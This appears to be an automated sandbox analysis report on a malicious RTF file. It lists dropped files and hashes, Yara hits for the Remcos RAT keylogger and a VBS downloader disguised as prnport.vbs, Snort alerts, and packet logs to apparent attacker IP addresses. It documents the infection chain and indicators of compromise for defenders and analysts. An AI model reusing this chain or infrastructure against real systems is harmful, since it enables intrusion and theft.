                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1

                                                      C:\Users\user\AppData\Local\Temp\karhafqd.k2v.psm1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1

                                                      C:\Users\user\AppData\Local\Temp\note\nots.dat

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):420
                                                      Entropy (8bit):3.464161626974459
                                                      Encrypted:false
                                                      SSDEEP:6:6lx7Q4b5YcIeeDAlpJSNombQeWAAey11Vl+Skec/l1Vl+SkIMl419gQB:6lC4DeclyZWFe2wB/NwEMQgM
                                                      MD5:285BF8210F3F2CB23C5FE9D23CF35A5F
                                                      SHA1:48CF69F50FEA0BAEDE2CAE128EC4DFC1702B1DF6
                                                      SHA-256:D21359D2D0CF9B7899AE4EBA656B12319195C22F5CF561994F66499DBFA7B7D1
                                                      SHA-512:61F84486FD28584AE6BC9B9D8CB02BE696AD56BA778C02A00C7A9A60236EA5C2649BA00B1A8A3C8C72C575C7C6AFCF2639A04DCBF52702EABAC09A767968AE06
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\note\nots.dat, Author: Joe Security
                                                      Preview:....[.2.0.2.4./.0.5./.0.1. .1.4.:.5.5.:.4.5. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.i.m.g.s. .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.]. .-. .M.i.c.r.o.s.o.f.t. .W.o.r.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].....[.R.u.n.].........[.W.i.n.d.o.w.s. .S.c.r.i.p.t. .H.o.s.t.].........[.R.u.n.].........[.W.i.n.d.o.w.s. .E.x.p.l.o.r.e.r.].........[.M.i.c.r.o.s.o.f.t. .W.o.r.d.].....

                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:Generic INItialization configuration [folders]
                                                      Category:dropped
                                                      Size (bytes):55
                                                      Entropy (8bit):4.676725395303505
                                                      Encrypted:false
                                                      SSDEEP:3:HAwUXp64om4D5Xp64ov:HVV4+64y
                                                      MD5:DF9E342898C52C265F99E90FF588958D
                                                      SHA1:1B6FBD102446763F368C6DAB43FB03ECBAD5D567
                                                      SHA-256:B69ED7945C4881ACE5A8CCC8C8187871773EB975CE91E8E315DEED91753FDE07
                                                      SHA-512:889BAA91F18F9D8F4D820466676A37B8F8E8C51B099F31A7FE6F232030D4740CFF13B68732BC75AED6AA2A358960B04DB37D9673CEA39D502DF158C71D8D9972
                                                      Malicious:false
                                                      Preview:[misc]..nU7Z8sPyvf.LNK=0..[folders]..nU7Z8sPyvf.LNK=0..

                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\nU7Z8sPyvf.LNK

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:08 2023, mtime=Fri Aug 11 15:42:08 2023, atime=Wed May 1 11:54:57 2024, length=78038, window=hide
                                                      Category:dropped
                                                      Size (bytes):1014
                                                      Entropy (8bit):4.548581584116542
                                                      Encrypted:false
                                                      SSDEEP:12:8tl5qsFgXg/XAlCPCHaXWB5B/5YXX+W2haWIIiv+2icvbsrTC40iv+mDtZ3YilMz:8tL5/XTmr4Xci+Fe0+i+mDv3qrik7N
                                                      MD5:C4510DBD04E169E1BA8C8C0E1507F7E3
                                                      SHA1:B52619E75A66ADE4434926AC3161DE635A18674C
                                                      SHA-256:9EA42014B952B435FD5D89E72923CC1995CEEE9B85AB7D828B70837BB1FEAB45
                                                      SHA-512:335619CEF82C4E4263104C780DCD30E81E66E025696DF7DE0951E8D917703B371588AB9CD3AF73D4ED93DD5613F8B7DA4904D6C0D1E8A0326400AF906CE47BF7
                                                      Malicious:false
                                                      Preview:L..................F.... .......r.......r.....H.....0...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X.f..user.8......QK.X.X.f*...&=....U...............A.l.b.u.s.....z.1......WF...Desktop.d......QK.X.WF.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2..0...X.f .NU7Z8S~1.RTF..J.......WE..WE.*.........................n.U.7.Z.8.s.P.y.v.f...r.t.f.......x...............-...8...[............?J......C:\Users\..#...................\\818225\Users.user\Desktop\nU7Z8sPyvf.rtf.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.n.U.7.Z.8.s.P.y.v.f...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......818225..........D_....3N...W...9.W.e8...8.....[D_....3N...W...9.W.e8

                                                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):162
                                                      Entropy (8bit):2.4797606462020307
                                                      Encrypted:false
                                                      SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                      MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                      SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                      SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                      SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                      Malicious:false
                                                      Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                      C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs

                                                      Download File
                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      File Type:Unknown
                                                      Category:dropped
                                                      Size (bytes):62754
                                                      Entropy (8bit):3.415813360054804
                                                      Encrypted:false
                                                      SSDEEP:384:FZAaML0EZDnd33oBd33sGMnpMV4ZIRpuPkG6jM1L7Kc0ZCEXJg:7xindnoBdngiV4ZIRgPkGq9ZxZg
                                                      MD5:69A1EBFD93489A6D3DA3ED27FE410D2D
                                                      SHA1:7E138C9C08073B3398BEBFD3DABE8CCD0DE2BA91
                                                      SHA-256:0A363498260F2D08ED884453FC508E0F8812E16C95AA824C8F3A72BE2DEBA140
                                                      SHA-512:4925CC93A10364966AE6F432194D3613A51D176F4EEFD447B679446DCB6CADC008755BC1E17DADA1FCACA2FC56489BA9783CB4A89369B0505BAD1E2C9E578BE5
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_VBS_Downloader_Generic, Description: Yara detected VBS Downloader Generic, Source: C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs, Author: Joe Security
                                                      Preview:..'.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....'.....'. .C.o.p.y.r.i.g.h.t. .(.c.). .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n... .A.l.l. .r.i.g.h.t.s. .r.e.s.e.r.v.e.d.......'.....'. .A.b.s.t.r.a.c.t.:.....'. .p.r.n.p.o.r.t...v.b.s. .-. .P.o.r.t. .s.c.r.i.p.t. .f.o.r. .W.M.I. .o.n. .W.i.n.d.o.w.s. .....'. . . . . .u.s.e.d. .t.o. .a.d.d.,. .d.e.l.e.t.e. .a.n.d. .l.i.s.t. .p.o.r.t.s.....'. . . . . .a.l.s.o. .f.o.r. .g.e.t.t.i.n.g. .a.n.d. .s.e.t.t.i.n.g. .t.h.e. .p.o.r.t. .c.o.n.f.i.g.u.r.a.t.i.o.n.....'.....'. .U.s.a.g.e.:.....'. .p.r.n.p.o.r.t. .[.-.a.d.l.g.t.?.]. .[.-.r. .p.o.r.t.]. .[.-.s. .s.e.r.v.e.r.]. .[.-.u. .u.s.e.r. .n.a.m.e.]. .[.-.w. .p.a.s.s.w.o.r.d.].....'. . . . . . . . . . . . . . . . . . . .[.-.o. .r.a.w.|.l.p.r.]. .[.-.h. .h.o.s.t. .a.d.d.r.e.s.s.]. .[.-.q. .q.u.e.u.e.]. .[.-.n. .n.u.m.b.e.r.].....'. . . . . . . . . . . . . . . . . . . .[.-.m.e. .|. .-.m.d. .]. .[.-.i.

                                                      C:\Users\user\Desktop\~$7Z8sPyvf.rtf

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):162
                                                      Entropy (8bit):2.4797606462020307
                                                      Encrypted:false
                                                      SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                      MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                      SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                      SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                      SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                      Malicious:false
                                                      Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                      \Device\Mup\YPSIACH*\MAILSLOT\NET\NETLOGON

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\wscript.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):59
                                                      Entropy (8bit):3.380843392604297
                                                      Encrypted:false
                                                      SSDEEP:3:ydlX85I2Y1AnI0lLn:yndGIcLn
                                                      MD5:FD9BBFB6504AF9874B4BA3AC07178758
                                                      SHA1:49F24EF83F932F2C3A2814280F08910BC64B5CC8
                                                      SHA-256:AD0D3FB267F1BC5DF8089A8D49C066CF55B0D632187AB1443F614B8A27844176
                                                      SHA-512:B317C14F57C568EC08F7B32E33B8CB42E353B17F98DA3ABFB02189DEDF8D7F632B948C99273DDCF818BFECAC777EA536CFED71729D385DA8A7285A0870DD3CAF
                                                      Malicious:false
                                                      Preview:....8.1.8.2.2.5.....\MAILSLOT\NET\GETDC622.................

                                                      Static File Info

                                                      General

                                                      File type:Rich Text Format data, version 1
                                                      Entropy (8bit):2.7686143213703787
                                                      TrID:
                                                      • Rich Text Format (5005/1) 55.56%
                                                      • Rich Text Format (4004/1) 44.44%
                                                      File name:nU7Z8sPyvf.rtf
                                                      File size:78'038 bytes
                                                      MD5:0aba1094e29ed6d65fa5a8b1ec8c2e57
                                                      SHA1:5eb1d60525661ec561ae7e56ed2a5798c0462c1e
                                                      SHA256:45ba5f0e0f5ea330c12f0081f8861a75e65f2849e67038c6106930dd66543186
                                                      SHA512:2ed36b870531ea151290fea7942f4fed89e36a946e343b36134bae50f6d6b3a54902f25461ddf7d137d317bc81e30642379facf4b043c4a2191e8241a8d10eb5
                                                      SSDEEP:1536:CfcQtfa+Hc4YZJBQZCc45Wb/2Y0pRObbhIatQqJlioDfeMbKekD:ufa+Hc4YZJBQZV45Wb/qROb9IEJlioDO
                                                      TLSH:D973AA6DE30F0958DF55A67B434A4A4A05FCB33EB38540B139AC977437ADC2E4A2287C
                                                      File Content Preview:{\rtf1...........{\mmodsofilter704716200 \%}.{\528766508%?6*.*=`+/$6).~%5=|]2/_#+89.*@.@6[^>[.)0](_.[.%71.@!39*!`.?_(3^`/5(&.7^+],@)<?=-:%1>%-*!&#,+-~3.(??9><%!|^1.%!-~7.2+/<^6+`:([)?>/5(*3])?<%?([]-&=,.~(?|#5(+.6?.?.!%%)?16#~|;.`4-(??9@30;`?>3,),/;!.#2<0

                                                      File Icon

                                                      Icon Hash:2764a3aaaeb7bdbf

                                                      Static RTF Info

                                                      Objects

                                                      IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                      000000A5Dhno

                                                      Network Behavior

                                                      Snort IDS Alerts

                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                      05/01/24-14:55:30.813240TCP2018856ET TROJAN Windows executable base64 encoded44349168172.67.215.45192.168.2.22
                                                      05/01/24-14:55:30.813240TCP2047750ET TROJAN Base64 Encoded MZ In Image44349168172.67.215.45192.168.2.22
                                                      05/01/24-14:55:31.602932TCP2025011ET TROJAN Powershell commands sent B64 244349168172.67.215.45192.168.2.22
                                                      05/01/24-14:55:44.958525TCP2020424ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 2 M18049169107.172.31.6192.168.2.22
                                                      05/01/24-14:55:31.605872TCP2049038ET TROJAN Malicious Base64 Encoded Payload In Image44349168172.67.215.45192.168.2.22
                                                      05/01/24-14:55:44.958525TCP2020423ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 1 M18049169107.172.31.6192.168.2.22

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      May 1, 2024 14:55:03.341681004 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.497400045 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.497528076 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.500185013 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.656900883 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.656919956 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.656984091 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.657048941 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.657062054 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.657073021 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.657107115 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.657113075 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.657113075 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.657119989 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.657145023 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.657155991 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.657160044 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.657169104 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.657196999 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.657210112 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.657217026 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.657253981 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.660396099 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.816699028 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.816739082 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.816761017 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.816793919 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.816798925 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.816814899 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.816828966 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.816828966 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.816839933 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.816845894 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.816859007 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.816878080 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.816885948 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.816895962 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.816899061 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.816912889 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.816917896 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.816925049 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.816937923 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.816945076 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.816953897 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.816966057 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.816972017 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.816979885 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.816987991 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.816992044 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.817023993 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.817028999 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.817035913 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.817042112 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.817048073 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.817054987 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.817059040 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.817071915 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.817075968 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.817085028 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.817101002 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.817424059 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.971970081 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.972043037 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.972073078 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.972095966 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.972111940 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.972127914 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.972140074 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.972171068 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.972170115 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.972171068 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.972171068 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.972171068 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.972183943 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.972197056 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.972204924 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.972208977 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.972224951 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.972248077 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.972248077 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.972259045 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.972275019 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.972289085 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.972300053 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.972311020 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.972311974 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.972311020 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.972323895 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.972337961 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.972338915 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.972347021 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.972357035 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.972358942 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.972395897 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.972395897 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.972466946 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.972512960 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.972696066 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:04.566231966 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:24.091336966 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.091381073 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.091434002 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.093838930 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.093868971 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.299412966 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.299489975 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.312580109 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.312598944 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.312941074 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.312985897 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.515609026 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.556126118 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.761301041 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.761365891 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.761389017 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.761404037 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.761415958 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.761437893 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.761439085 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.761449099 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.761473894 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.761478901 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.761509895 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.761512995 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.761544943 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.761549950 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.761578083 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.790498972 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.790537119 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.790543079 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.790575027 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.790677071 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.790704966 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.790710926 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.790740967 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.790944099 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.790986061 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.790990114 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.791004896 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.791038990 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.791091919 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.791102886 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.791115999 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.791141033 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:26.680411100 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:26.680447102 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:26.680509090 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:26.698052883 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:26.698067904 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:26.901074886 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:26.901140928 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:26.905508995 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:26.905519962 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:26.905869007 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:27.112127066 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:27.112210035 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.236757040 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.280122042 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.360438108 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.360487938 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.360521078 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.360532999 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.360548973 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.360584974 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.360591888 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.360634089 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.360671997 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.360678911 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.360860109 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.360887051 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.360898972 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.360905886 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.360946894 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.361195087 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.361279011 CEST44349167172.67.215.45192.168.2.22
